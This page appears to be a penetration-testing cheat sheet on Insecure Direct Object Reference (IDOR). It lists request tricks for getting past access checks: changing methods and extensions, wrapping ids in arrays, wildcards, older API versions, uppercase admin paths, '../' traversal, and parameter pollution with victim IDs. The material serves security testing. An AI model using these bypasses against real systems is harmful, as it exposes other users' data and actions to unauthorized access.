pwny.cc
Search…
Home
WEB ATTACKS
Misc
OAuth
Open Redirect
Command Injection
Local File Inclusion (LFI)
Insecure File Upload
Insecure Direct Object Reference (IDOR)
SQL Injection (SQLi)
Cross-Site Scripting (XSS)
Server Side Request Forgery (SSRF)
Server Side Template Injection (SSTI)
XML External Entity (XXE)
SHELLS
Misc
Web Shells
Reverse Shells
Obfuscated Shells
SO
Linux
Windows
OTHER
Sandbox Escape
Cracking
Powered By
GitBook
Insecure Direct Object Reference (IDOR)
Change HTTP method
1
GET /users/delete/123 -
>
403
2
POST /users/delete/123 -
>
200
Copied!
Change file extension
Try to change the extension of the endpoint that you have.
1
#Endpoint found
2
/users/password -
>
401
3
​
4
#Endpoints to test
5
/users/password.json
6
/users/password.xml
Copied!
Convert request body
Convert the body of the request to array or to include a json on it.
1
#Original body
2
{
"id"
:1
}
3
​
4
#Bypasses
5
{
"id"
:
[
1
]}
6
{
"id"
:
{
"id"
:1
}}
Copied!
Test wildcards
Change the identifier of the request to a wildcard.
1
#Original request
2
/api/v1/userlist/user1
3
​
4
#Wildcard bypasses
5
/api/v1/userlist/*
Copied!
Check another version
Many API endpoints expose the version in the request, try to change it to use another older.
1
#Original request
2
/api/v3/user/user3
3
​
4
#Changed version of the same endpoint
5
/api/v2/user/user3
6
/api/v1/user/user3
Copied!
Missing Function Level Access Control (MFLAC)
1
GET /admin/profile -
>
401
2
GET /ADMIN/profile -
>
200
Copied!
Path Traversal Secondary Context
1
#Original request
2
POST /users/delete/123 -
>
403
3
​
4
#Bypass
5
POST /users/delete/MY_ID/
..
/123 -
>
200
Copied!
HTTP Parameter Pollution
1
GET /api/v1/messages?user_id=ATACKER_ID&user_id=VICTIM_ID
2
GET /api/v1/messages?user_id=VICTIM_ID&user_id=ATACKER_ID
Copied!
References
Autorize
Burp Suite extension aimed at helping the penetration tester to detect authorization vulnerabilities
Auto Repeater
Burp Suite extension that automatically repeats requests, with replacement rules and response diffing
WEB ATTACKS - Previous
Insecure File Upload
Next - WEB ATTACKS
SQL Injection (SQLi)
Last modified
6mo ago
Copy link
Contents
Change HTTP method
Change file extension
Convert request body
Test wildcards
Check another version
Missing Function Level Access Control (MFLAC)
Path Traversal Secondary Context
HTTP Parameter Pollution
References